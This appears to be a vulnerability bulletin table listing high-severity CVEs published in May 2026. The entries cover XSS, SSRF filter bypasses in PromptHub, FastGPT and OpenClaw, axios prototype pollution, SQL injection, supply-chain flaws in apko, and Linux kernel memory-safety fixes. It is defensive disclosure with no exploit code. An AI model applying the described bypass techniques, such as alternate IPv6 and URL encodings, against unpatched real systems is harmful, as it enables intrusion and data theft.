| Icinga--ipl-web | ipl/web is a set of common web components for php projects. Prior to version 0.13.1, the vulnerability allows an attacker to inject malicious Javascript into a victim's browser to run it in the context of Icinga Web. The victim needs to visit a specifically prepared website and may have no immediate chance to notice any wrongdoing. This issue has been patched in version 0.13.1. | 2026-05-08 | 7.6 | CVE-2026-42224 | https://github.com/Icinga/ipl-web/security/advisories/GHSA-55wf-5m3q-6jjf https://github.com/Icinga/ipl-web/commit/f387e92504d7a03bb857d1aee9b7410e06dd065d https://github.com/Icinga/ipl-web/releases/tag/v0.13.1 |
| legeling--PromptHub | PromptHub is an all-in-one AI toolbox for prompt, skill, and agent management. From version 0.4.9 to before version 0.5.4, apps/web/src/routes/skills.ts exposes an authenticated endpoint POST /api/skills/fetch-remote that fetches a user-supplied URL server-side and reflects the response body (up to 5 MB) back to the caller. The SSRF protection in apps/web/src/utils/remote-http.ts (isPrivateIPv6) attempts to block private/loopback destinations, but multiple alternate-but-valid IPv6 representations bypass the check. The bypasses reach any IPv4 address (loopback, RFC1918, link-local) via IPv4-mapped IPv6 in hex form, and the canonical ::1 via any representation that isn't the literal string "::1". Any authenticated user (role: user or admin) can trigger the SSRF. On deployments configured with ALLOW_REGISTRATION=true - a supported and documented configuration - this means any internet user who can register. This issue has been patched in version 0.5.4. | 2026-05-08 | 7.1 | CVE-2026-42261 | https://github.com/legeling/PromptHub/security/advisories/GHSA-9fhh-fjfg-5mr6 https://github.com/legeling/PromptHub/releases/tag/v0.5.4 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. From version 1.0.0 to before version 1.15.2, fFive config properties (auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser) in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request. This issue has been patched in version 1.15.2. | 2026-05-08 | 7.4 | CVE-2026-42264 | https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj https://github.com/axios/axios/pull/10779 https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa https://github.com/axios/axios/releases/tag/v1.15.2 |
| osrg--gobgp | GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. In version 4.4.0, an unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability. This issue has been patched in version 4.5.0. | 2026-05-07 | 7.5 | CVE-2026-42285 | https://github.com/osrg/gobgp/security/advisories/GHSA-p3w2-64xm-833j https://github.com/osrg/gobgp/releases/tag/v4.5.0 |
| befeleme--pyp2spec | pyp2spec generates working Fedora RPM spec file for Python projects. Prior to version 0.14.1, pyp2spec was writing PyPI package metadata (e.g. the summary field) into the generated spec file without escaping RPM macro directives. When a packager then runs rpmbuild, those directives get evaluated, so a malicious package can execute arbitrary commands on the build machine. This issue has been patched in version 0.14.1. | 2026-05-09 | 7.8 | CVE-2026-42301 | https://github.com/befeleme/pyp2spec/security/advisories/GHSA-r35x-v8p8-xvhw https://github.com/befeleme/pyp2spec/releases/tag/v0.14.1 |
| labring--FastGPT | FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts blocks cloud metadata endpoints using a fullUrl.startsWith() check against a hardcoded list. This check can be bypassed using at least 7 different URL encoding techniques, all of which resolve to the same cloud metadata service but do not match the blocklist patterns. Additionally, the broader private IP check (isInternalIPv4/isInternalIPv6) is disabled by default because CHECK_INTERNAL_IP defaults to false (not 'true'), so these bypasses reach the metadata endpoint without any further validation. At time of publication, there are no publicly available patches. | 2026-05-08 | 7.7 | CVE-2026-42345 | https://github.com/labring/FastGPT/security/advisories/GHSA-jhqw-944x-xh94 |
| geopython--pygeoapi | pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, a raw string path concatenation vulnerability in pygeoapi's STAC FileSystemProvider plugin can allow for requests to STAC collection based collections to expose directories without authentication. The issue manifests when pygeoapi is deployed without a proxy or web front end that would normalize URLs with .. values, along with a resource of type stac-collection defined in configuration. This issue has been patched in version 0.23.3. | 2026-05-08 | 7.5 | CVE-2026-42351 | https://github.com/geopython/pygeoapi/security/advisories/GHSA-f6pr-83pg-ghh6 https://github.com/geopython/pygeoapi/commit/bf25b8695edbdd5476eeffc102b633d1d3e45f52 https://github.com/geopython/pygeoapi/releases/tag/0.23.3 |
| GeoVision Inc.--GV-LPC2011/LPC2211 | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the Web Interface / ssi.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted malicious url can lead to an arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-05-04 | 7.4 | CVE-2026-42366 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.14 contains an improper access control vulnerability in browser snapshot, screenshot, and tab routes that fail to consistently validate the final browser target after navigation. Authenticated callers can bypass SSRF restrictions to expose internal or disallowed page content by exploiting route-driven navigation without proper policy re-validation. | 2026-05-05 | 7.7 | CVE-2026-42436 | GitHub Security Advisory (GHSA-c4qm-58hj-j6pj) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.14 - Internal Page Content Exposure via Browser Snapshot and Screenshot Routes |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.9 before 2026.4.10 contain a denial of service vulnerability in the voice-call realtime WebSocket path that accepts oversized frames without proper validation. Remote attackers can send oversized WebSocket frames to cause service unavailability for deployments exposing the webhook path. | 2026-05-05 | 7.5 | CVE-2026-42437 | GitHub Security Advisory (GHSA-vw3h-q6xq-jjm5) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.9 < 2026.4.10 - Denial of Service via Oversized WebSocket Frames in Voice-call Realtime Path |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.9 before 2026.4.10 contain a sender policy bypass vulnerability in the outbound host-media attachment read helper that allows unauthorized local file disclosure. Attackers with denied read access via toolsBySender or group policy can trigger host-media attachment loading to bypass sender and group-scoped authorization boundaries and retrieve readable local files through the outbound media path. | 2026-05-05 | 7.7 | CVE-2026-42438 | GitHub Security Advisory (GHSA-jhpv-5j76-m56h) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.9 < 2026.4.10 - Sender Policy Bypass in Host Media Attachment Reads |
| chainguard-dev--apko | apko allows users to build and publish OCI container images built from apk packages. From version 0.14.8 to before version 1.2.5, a crafted .apk could install a TypeSymlink tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. This issue has been patched in version 1.2.5. | 2026-05-09 | 7.5 | CVE-2026-42574 | https://github.com/chainguard-dev/apko/security/advisories/GHSA-qq3r-w4hj-gjp6 https://github.com/chainguard-dev/apko/pull/2187 https://github.com/chainguard-dev/apko/commit/f5a96e1299ac81c7ea9441705ec467688086f442 https://github.com/chainguard-dev/apko/releases/tag/v1.2.5 |
| chainguard-dev--apko | apko allows users to build and publish OCI container images built from apk packages. Prior to version 1.2.7, apko verifies the signature on APKINDEX.tar.gz but never compares individually downloaded .apk packages against the checksum recorded in the signed index. The checksum is parsed and available via ChecksumString(), and the downloaded package control hash is computed, but the two values are never compared in getPackageImpl(). Mismatched packages are silently accepted. An attacker who can substitute download responses (compromised mirror, HTTP repository, poisoned CDN cache) can install arbitrary packages into built images. This issue has been patched in version 1.2.7. | 2026-05-09 | 7.5 | CVE-2026-42575 | https://github.com/chainguard-dev/apko/security/advisories/GHSA-hcwr-pq9g-rq3m https://github.com/chainguard-dev/apko/commit/a118c3d604107532b5525bd4bee2fb369a6228aa https://github.com/chainguard-dev/apko/releases/tag/v1.2.7 |
| OpenStack--Ironic | An issue was discovered in idrac in OpenStack Ironic before 35.0.1. During import, a user invoking molds can request authorization to be sent to a remote endpoint. The credential forwarded is a time-limited Keystone token (which provides access to all OpenStack services Ironic is authorized for); or basic credentials configured for molds storage. The fixed versions are 26.1.6, 29.0.5, 32.0.1, and 35.0.1. | 2026-05-05 | 7.7 | CVE-2026-42997 | https://www.openwall.com/lists/oss-security/2026/05/05/10 https://security.openstack.org/ossa/OSSA-2026-010.html |
| WeePie--WeePie Cookie Allow | The WeePie Cookie Allow plugin for WordPress is vulnerable to SQL Injection via the 'consent' parameter in all versions up to, and including, 3.4.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-05 | 7.5 | CVE-2026-4304 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f783e626-37c0-4ad9-9074-c5332583a0cb?source=cve https://codecanyon.net/item/weepie-cookie-allow-easy-complete-cookie-consent-plugin/10342528 https://weepie-plugins.com/changelog-weepie-cookie-allow-plugin/ |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: drop pending enqueued packets on removal Packets sitting in nfqueue might hold a reference to: - templates that specify the conntrack zone, because a percpu area is used and module removal is possible. - conntrack timeout policies and helper, where object removal leave a stale reference. Since these objects can just go away, drop enqueued packets to avoid stale reference to them. If there is a need for finer grain removal, this logic can be revisited to make selective packet drop upon dependencies. | 2026-05-05 | 7.8 | CVE-2026-43060 | https://git.kernel.org/stable/c/8a64e76933672b08bd85b63086f33432070fd729 https://git.kernel.org/stable/c/3da0b946835f33bf36b459ead764c61a761e689b https://git.kernel.org/stable/c/ab50302190b303f847c4eba0e31a01a56dec596e https://git.kernel.org/stable/c/e68a8db3a0546482b34e9ca5ca886bcf73eb37bb https://git.kernel.org/stable/c/6802ff8beceb9c4254318e81c1395720438f2cc2 https://git.kernel.org/stable/c/f29a055e4f593e577805b41228b142b58f48df1b https://git.kernel.org/stable/c/77da55dee67720e2b8d2db49a53334e6c017ee7b https://git.kernel.org/stable/c/36eae0956f659e48d5366d9b083d9417f3263ddc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix type confusion in l2cap_ecred_reconf_rsp() l2cap_ecred_reconf_rsp() casts the incoming data to struct l2cap_ecred_conn_rsp (the ECRED *connection* response, 8 bytes with result at offset 6) instead of struct l2cap_ecred_reconf_rsp (2 bytes with result at offset 0). This causes two problems: - The sizeof(*rsp) length check requires 8 bytes instead of the correct 2, so valid L2CAP_ECRED_RECONF_RSP packets are rejected with -EPROTO. - rsp->result reads from offset 6 instead of offset 0, returning wrong data when the packet is large enough to pass the check. Fix by using the correct type. Also pass the already byte-swapped result variable to BT_DBG instead of the raw __le16 field. | 2026-05-05 | 7.1 | CVE-2026-43062 | https://git.kernel.org/stable/c/21d3ba696918d6373233aac0b9d51fcabdedddc0 https://git.kernel.org/stable/c/3b94e62caa1dc1198d0d55d97bd710da1dee15d7 https://git.kernel.org/stable/c/111f74547eee8cfedfb854284e80f35c8a491186 https://git.kernel.org/stable/c/dd3b221e21079ade8263fbb7176f3d55ad75d3b6 https://git.kernel.org/stable/c/d90150c72d2e6a8a3079e88755dafcfbe91c746d https://git.kernel.org/stable/c/5a1ea296f8589ce8f1e3141b2b123b34ad010e19 https://git.kernel.org/stable/c/f110b8f58b254bf997cec1bd60701b7798e9bb82 https://git.kernel.org/stable/c/15145675690cab2de1056e7ed68e59cbd0452529 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: don't irele after failing to iget in xfs_attri_recover_work xlog_recovery_iget* never set @ip to a valid pointer if they return an error, so this irele will walk off a dangling pointer. Fix that. | 2026-05-05 | 7.8 | CVE-2026-43063 | https://git.kernel.org/stable/c/b5c5a50c2f513d4a13a6763564a07b470e69cc5a https://git.kernel.org/stable/c/a1a5df1038f0b3c560d204270373621a4e622808 https://git.kernel.org/stable/c/40082d08b638485cbaa543dc8087a3d1844d6f08 https://git.kernel.org/stable/c/70685c291ef82269180758130394ecdc4496b52c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Reset register ID for BPF_END value tracking When a register undergoes a BPF_END (byte swap) operation, its scalar value is mutated in-place. If this register previously shared a scalar ID with another register (e.g., after an `r1 = r0` assignment), this tie must be broken. Currently, the verifier misses resetting `dst_reg->id` to 0 for BPF_END. Consequently, if a conditional jump checks the swapped register, the verifier incorrectly propagates the learned bounds to the linked register, leading to false confidence in the linked register's value and potentially allowing out-of-bounds memory accesses. Fix this by explicitly resetting `dst_reg->id` to 0 in the BPF_END case to break the scalar tie, similar to how BPF_NEG handles it via `__mark_reg_known`. | 2026-05-05 | 7.8 | CVE-2026-43070 | https://git.kernel.org/stable/c/a17443af874229408ce6b78e2c8a2b5adeb4b7d8 https://git.kernel.org/stable/c/0d15c3611a2cc5d08993545d4032055ae10ae2c1 https://git.kernel.org/stable/c/a3125bc01884431d30d731461634c8295b6f0529 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: eventpoll: defer struct eventpoll free to RCU grace period In certain situations, ep_free() in eventpoll.c will kfree the epi->ep eventpoll struct while it still being used by another concurrent thread. Defer the kfree() to an RCU callback to prevent UAF. | 2026-05-06 | 7.8 | CVE-2026-43074 | https://git.kernel.org/stable/c/a6566cd33f6f967a7651ebf2ce0dd31572e319cf https://git.kernel.org/stable/c/5b1173b165421561db29f30afc7e97d940a398a9 https://git.kernel.org/stable/c/7e8083f5eeedab0f460063b9c2c14c9a4e71a427 https://git.kernel.org/stable/c/ae0bb9c1fb7c2594519aeeb096cf2c3b7837b322 https://git.kernel.org/stable/c/07712db80857d5d09ae08f3df85a708ecfc3b61f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix out-of-bounds write in ocfs2_write_end_inline KASAN reports a use-after-free write of 4086 bytes in ocfs2_write_end_inline, called from ocfs2_write_end_nolock during a copy_file_range splice fallback on a corrupted ocfs2 filesystem mounted on a loop device. The actual bug is an out-of-bounds write past the inode block buffer, not a true use-after-free. The write overflows into an adjacent freed page, which KASAN reports as UAF. The root cause is that ocfs2_try_to_write_inline_data trusts the on-disk id_count field to determine whether a write fits in inline data. On a corrupted filesystem, id_count can exceed the physical maximum inline data capacity, causing writes to overflow the inode block buffer. Call trace (crash path): vfs_copy_file_range (fs/read_write.c:1634) do_splice_direct splice_direct_to_actor iter_file_splice_write ocfs2_file_write_iter generic_perform_write ocfs2_write_end ocfs2_write_end_nolock (fs/ocfs2/aops.c:1949) ocfs2_write_end_inline (fs/ocfs2/aops.c:1915) memcpy_from_folio <-- KASAN: write OOB So add id_count upper bound check in ocfs2_validate_inode_block() to alongside the existing i_size check to fix it. | 2026-05-06 | 7.8 | CVE-2026-43075 | https://git.kernel.org/stable/c/e2c9dc6b6e96f3585f2a1062ca3374a52db0938f https://git.kernel.org/stable/c/947f953978b0d9463498d548d0f054f5a75be2e9 https://git.kernel.org/stable/c/0c1af902223b6fcedb60904ca0b551254686c7b9 https://git.kernel.org/stable/c/69d3c69ade1e4285ab4ca48fe7acee0767e65604 https://git.kernel.org/stable/c/7bc5da4842bed3252d26e742213741a4d0ac1b14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: validate inline data i_size during inode read When reading an inode from disk, ocfs2_validate_inode_block() performs various sanity checks but does not validate the size of inline data. If the filesystem is corrupted, an inode's i_size can exceed the actual inline data capacity (id_count). This causes ocfs2_dir_foreach_blk_id() to iterate beyond the inline data buffer, triggering a use-after-free when accessing directory entries from freed memory. In the syzbot report: - i_size was 1099511627576 bytes (~1TB) - Actual inline data capacity (id_count) is typically <256 bytes - A garbage rec_len (54648) caused ctx->pos to jump out of bounds - This triggered a UAF in ocfs2_check_dir_entry() Fix by adding a validation check in ocfs2_validate_inode_block() to ensure inodes with inline data have i_size <= id_count. This catches the corruption early during inode read and prevents all downstream code from operating on invalid data. | 2026-05-06 | 7.8 | CVE-2026-43076 | https://git.kernel.org/stable/c/37f074e65f24f10f8d8df224a572e4cb9e6faf63 https://git.kernel.org/stable/c/c1de19e891be3bfb3e1d0c7cf07bbb8fb3b77c1b https://git.kernel.org/stable/c/cd2d765aa7157f852999842af32148128c735d39 https://git.kernel.org/stable/c/77d0295725109d77f5854ef5b58c0d06c08168cc https://git.kernel.org/stable/c/1524af3685b35feac76662cc551cbc37bd14775f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl When page reassignment was added to af_alg_pull_tsgl the original loop wasn't updated so it may try to reassign one more page than necessary. Add the check to the reassignment so that this does not happen. Also update the comment which still refers to the obsolete offset argument. | 2026-05-06 | 7.8 | CVE-2026-43078 | https://git.kernel.org/stable/c/fa48d3ea9cdbfb28c1fd6756c6c5cd01351aa51e https://git.kernel.org/stable/c/2b781d1d4f933990318bcc5c68fb75a717379e42 https://git.kernel.org/stable/c/f7826bc0b39928a4a22f6b815dd9940b22a63503 https://git.kernel.org/stable/c/710a4ce5d7afd9fe082c75dec282ab4a11c0fe71 https://git.kernel.org/stable/c/c8369a6d62f5abde9cbd4b62c45bf4b996be2468 https://git.kernel.org/stable/c/dea5fcf085f977b6c2de1b2d4ec4767b6c840d1f https://git.kernel.org/stable/c/9532501e0f1b200ea80baa0e33e0b06da10bb271 https://git.kernel.org/stable/c/31d00156e50ecad37f2cb6cbf04aaa9a260505ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_queue: make hash table per queue Sharing a global hash table among all queues is tempting, but it can cause crash: BUG: KASAN: slab-use-after-free in nfqnl_recv_verdict+0x11ac/0x15e0 [nfnetlink_queue] [..] nfqnl_recv_verdict+0x11ac/0x15e0 [nfnetlink_queue] nfnetlink_rcv_msg+0x46a/0x930 kmem_cache_alloc_node_noprof+0x11e/0x450 struct nf_queue_entry is freed via kfree, but parallel cpu can still encounter such an nf_queue_entry when walking the list. Alternative fix is to free the nf_queue_entry via kfree_rcu() instead, but as we have to alloc/free for each skb this will cause more mem pressure. | 2026-05-06 | 7.8 | CVE-2026-43084 | https://git.kernel.org/stable/c/22730cb96093b5be0609063bbb1923dbecd61252 https://git.kernel.org/stable/c/41e3652a178cb0eecd48e0e6e27fbb73a004046a https://git.kernel.org/stable/c/9e5ebef91120d2764aefe557c3a484b6288f341f https://git.kernel.org/stable/c/936206e3f6ff411581e615e930263d6f8b78df9d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: Wait for RCU readers during policy netns exit xfrm_policy_fini() frees the policy_bydst hash tables after flushing the policy work items and deleting all policies, but it does not wait for concurrent RCU readers to leave their read-side critical sections first. The policy_bydst tables are published via rcu_assign_pointer() and are looked up through rcu_dereference_check(), so netns teardown must also wait for an RCU grace period before freeing the table memory. Fix this by adding synchronize_rcu() before freeing the policy hash tables. | 2026-05-06 | 7.8 | CVE-2026-43091 | https://git.kernel.org/stable/c/b66920a3348c0f63ba18365248fa21fbf0b3a937 https://git.kernel.org/stable/c/438b1f668ad58f46ce699bb48e4698a7839e3f9e https://git.kernel.org/stable/c/3733fce2871c9bca9dd18a1a23b1432ea215a094 https://git.kernel.org/stable/c/33a3149dd81a1e2f52b80ee1e0fc380b39f3d028 https://git.kernel.org/stable/c/069daad4f2ae9c5c108131995529d5f02392c446 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xsk: tighten UMEM headroom validation to account for tailroom and min frame The current headroom validation in xdp_umem_reg() could leave us with insufficient space dedicated to even receive minimum-sized ethernet frame. Furthermore if multi-buffer would come to play then skb_shared_info stored at the end of XSK frame would be corrupted. HW typically works with 128-aligned sizes so let us provide this value as bare minimum. Multi-buffer setting is known later in the configuration process so besides accounting for 128 bytes, let us also take care of tailroom space upfront. | 2026-05-06 | 7.8 | CVE-2026-43093 | https://git.kernel.org/stable/c/a03975beb9f6af0d8ac051e30b2abeabe618414f https://git.kernel.org/stable/c/0ec4d3f6e6934deb843b561ae048cd17218e5ad1 https://git.kernel.org/stable/c/9ea6ba4f3195dcba6e8b3e7b2e748593b7cafb12 https://git.kernel.org/stable/c/6523bc1b40e69301f24c14338b762af4739d6d39 https://git.kernel.org/stable/c/a315e022a72d95ef5f1d4e58e903cb492b0ad931 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: icmp: fix null-ptr-deref in icmp_build_probe() ipv6_stub->ipv6_dev_find() may return ERR_PTR(-EAFNOSUPPORT) when the IPv6 stack is not active (CONFIG_IPV6=m and not loaded), and passing this error pointer to dev_hold() will cause a kernel crash with null-ptr-deref. Instead, silently discard the request. RFC 8335 does not appear to define a specific response for the case where an IPv6 interface identifier is syntactically valid but the implementation cannot perform the lookup at runtime, and silently dropping the request may safer than misreporting "No Such Interface". | 2026-05-06 | 7.5 | CVE-2026-43099 | https://git.kernel.org/stable/c/47a8bf52156ac7e7a581eca31c1f964ba4258d4d https://git.kernel.org/stable/c/6be325206850a0891896d38bcf83a09d8b54ec48 https://git.kernel.org/stable/c/f91b3ed9e7fa82a70511b5f6901c88379acf2964 https://git.kernel.org/stable/c/5b9911582d441f72fe6ccb15ffe3303bbc07f6f5 https://git.kernel.org/stable/c/fde29fd9349327acc50d19a0b5f3d5a6c964dfd8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: ioam: fix potential NULL dereferences in __ioam6_fill_trace_data() We need to check __in6_dev_get() for possible NULL value, as suggested by Yiming Qian. Also add skb_dst_dev_rcu() instead of skb_dst_dev(), and two missing READ_ONCE(). Note that @dev can't be NULL. | 2026-05-06 | 7.5 | CVE-2026-43101 | https://git.kernel.org/stable/c/4198aab6f000b4febb18ea820fea20634dd789c7 https://git.kernel.org/stable/c/3719c234fa94c37c955b1ecd3742ef280ec135e6 https://git.kernel.org/stable/c/4e65a8b8daa18d63255ec58964dd192c7fdd9f8b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cachefiles: fix incorrect dentry refcount in cachefiles_cull() The patch mentioned below changed cachefiles_bury_object() to expect 2 references to the 'rep' dentry. Three of the callers were changed to use start_removing_dentry() which takes an extra reference so in those cases the call gets the expected references. However there is another call to cachefiles_bury_object() in cachefiles_cull() which did not need to be changed to use start_removing_dentry() and so was not properly considered. It still passed the dentry with just one reference so the net result is that a reference is lost. To meet the expectations of cachefiles_bury_object(), cachefiles_cull() must take an extra reference before the call. It will be dropped by cachefiles_bury_object(). | 2026-05-06 | 7.8 | CVE-2026-43106 | https://git.kernel.org/stable/c/6577df7dc7a7de128442b6192c7a32195c923480 https://git.kernel.org/stable/c/1635c2acdde86c4f555b627aec873c8677c421ed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: roccat: fix use-after-free in roccat_report_event roccat_report_event() iterates over the device->readers list without holding the readers_lock. This allows a concurrent roccat_release() to remove and free a reader while it's still being accessed, leading to a use-after-free. Protect the readers list traversal with the readers_lock mutex. | 2026-05-06 | 7.8 | CVE-2026-43111 | https://git.kernel.org/stable/c/e6a445513fbc6a0329d2d5ff375b6725750ec5a6 https://git.kernel.org/stable/c/e16a6d11bd77b81632165f02cf0d5946df74b3b7 https://git.kernel.org/stable/c/36bb2d0b915014bbdc5044982b31b57b78045b93 https://git.kernel.org/stable/c/bca0b595e15450dd66b1153c76c4ef1087ee011b https://git.kernel.org/stable/c/d802d848308b35220f21a8025352f0c0aba15c12 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: ensure safe access to master conntrack Holding reference on the expectation is not sufficient, the master conntrack object can just go away, making exp->master invalid. To access exp->master safely: - Grab the nf_conntrack_expect_lock, this gets serialized with clean_from_lists() which also holds this lock when the master conntrack goes away. - Hold reference on master conntrack via nf_conntrack_find_get(). Not so easy since the master tuple to look up for the master conntrack is not available in the existing problematic paths. This patch goes for extending the nf_conntrack_expect_lock section to address this issue for simplicity, in the cases that are described below this is just slightly extending the lock section. The add expectation command already holds a reference to the master conntrack from ctnetlink_create_expect(). However, the delete expectation command needs to grab the spinlock before looking up for the expectation. Expand the existing spinlock section to address this to cover the expectation lookup. Note that, the nf_ct_expect_iterate_net() calls already grabs the spinlock while iterating over the expectation table, which is correct. The get expectation command needs to grab the spinlock to ensure master conntrack does not go away. This also expands the existing spinlock section to cover the expectation lookup too. I needed to move the netlink skb allocation out of the spinlock to keep it GFP_KERNEL. For the expectation events, the IPEXP_DESTROY event is already delivered under the spinlock, just move the delivery of IPEXP_NEW under the spinlock too because the master conntrack event cache is reached through exp->master. While at it, add lockdep notations to help identify what codepaths need to grab the spinlock. | 2026-05-06 | 7.8 | CVE-2026-43116 | https://git.kernel.org/stable/c/f338ced0473849c9f6ed0b77ca99f1aab5826787 https://git.kernel.org/stable/c/497f99b26fffdc5635706d1b4811f1ed8ee21a5b https://git.kernel.org/stable/c/bffcaad9afdfe45d7fc777397d3b83c1e3ebffe5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix double free related to rereg_user_mr If IB_MR_REREG_TRANS is set during rereg_user_mr, the umem will be released and a new one will be allocated in irdma_rereg_mr_trans. If any step of irdma_rereg_mr_trans fails after the new umem is allocated, it releases the umem, but does not set iwmr->region to NULL. The problem is that this failure is propagated to the user, who will then call ibv_dereg_mr (as they should). Then, the dereg_mr path will see a non-NULL umem and attempt to call ib_umem_release again. Fix this by setting iwmr->region to NULL after ib_umem_release. Fixed: 5ac388db27c4 ("RDMA/irdma: Add support to re-register a memory region") | 2026-05-06 | 7.8 | CVE-2026-43120 | https://git.kernel.org/stable/c/62298a48f8b8788ad8b8464e6ffdf1ddebd2217e https://git.kernel.org/stable/c/66964118f1f50ed85001c8fc9f7ab5bbdd021ee0 https://git.kernel.org/stable/c/0f22c32141acdcda266b26cab2b830baf870f3e0 https://git.kernel.org/stable/c/0c5d70bcb9d2275a1c8515a924016fcfeb4ab441 https://git.kernel.org/stable/c/29a3edd7004bb635d299fb9bc6f0ea4ef13ed5a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: mixer: oss: Add card disconnect checkpoints ALSA OSS mixer layer calls the kcontrol ops rather individually, and pending calls might be not always caught at disconnecting the device. For avoiding the potential UAF scenarios, add sanity checks of the card disconnection at each entry point of OSS mixer accesses. The rwsem is taken just before that check, hence the rest context should be covered by that properly. | 2026-05-06 | 7.8 | CVE-2026-43126 | https://git.kernel.org/stable/c/ae583f113d15fa97e5234133c20d09f8e6214e47 https://git.kernel.org/stable/c/e6645e625480cdf1079a4265f758d13b70721029 https://git.kernel.org/stable/c/8c097cf736993454acf3f711a3b376d6c7ad8965 https://git.kernel.org/stable/c/084d5d44418148662365eced3e126ad1a81ee3e2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/umem: Fix double dma_buf_unpin in failure path In ib_umem_dmabuf_get_pinned_with_dma_device(), the call to ib_umem_dmabuf_map_pages() can fail. If this occurs, the dmabuf is immediately unpinned but the umem_dmabuf->pinned flag is still set. Then, when ib_umem_release() is called, it calls ib_umem_dmabuf_revoke() which will call dma_buf_unpin() again. Fix this by removing the immediate unpin upon failure and just let the ib_umem_release/revoke path handle it. This also ensures the proper unmap-unpin unwind ordering if the dmabuf_map_pages call happened to fail due to dma_resv_wait_timeout (and therefore has a non-NULL umem_dmabuf->sgt). | 2026-05-06 | 7.8 | CVE-2026-43128 | https://git.kernel.org/stable/c/70542b69abff34d24b11ae0bb200cc7a766d18df https://git.kernel.org/stable/c/b324327ff6f48d8065dca67eb3b91357e72726bd https://git.kernel.org/stable/c/ba3bf0f1bf1d5d0404678485e872980532fcc2c4 https://git.kernel.org/stable/c/d3e32e2f3262f1b25d77c085ace38e2cc4ad75cf https://git.kernel.org/stable/c/40126bcbefa79ea86672e05dae608596bab38319 https://git.kernel.org/stable/c/104016eb671e19709721c1b0048dd912dc2e96be |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Always use vmcb01 in VMLOAD/VMSAVE emulation Commit cc3ed80ae69f ("KVM: nSVM: always use vmcb01 to for vmsave/vmload of guest state") made KVM always use vmcb01 for the fields controlled by VMSAVE/VMLOAD, but it missed updating the VMLOAD/VMSAVE emulation code to always use vmcb01. As a result, if VMSAVE/VMLOAD is executed by an L2 guest and is not intercepted by L1, KVM will mistakenly use vmcb02. Always use vmcb01 instead of the current VMCB. | 2026-05-06 | 7.9 | CVE-2026-43133 | https://git.kernel.org/stable/c/10063e1251c1485034a018236080792ad083dcc5 https://git.kernel.org/stable/c/c3b7015000988ba35ecd5648f4b2283960f00543 https://git.kernel.org/stable/c/3880e331b0b31d0d5d3702b124f6c93539cd478a https://git.kernel.org/stable/c/fce2fd4a2ca05670a91015aacccf96a1c26268fd https://git.kernel.org/stable/c/d464cf1ed900d47c85393d40b00017b6adfc2e6c https://git.kernel.org/stable/c/0004ecb798b30e90d7ebfe74efae2d9423315a64 https://git.kernel.org/stable/c/127ccae2c185f62e6ecb4bf24f9cb307e9b9c619 |
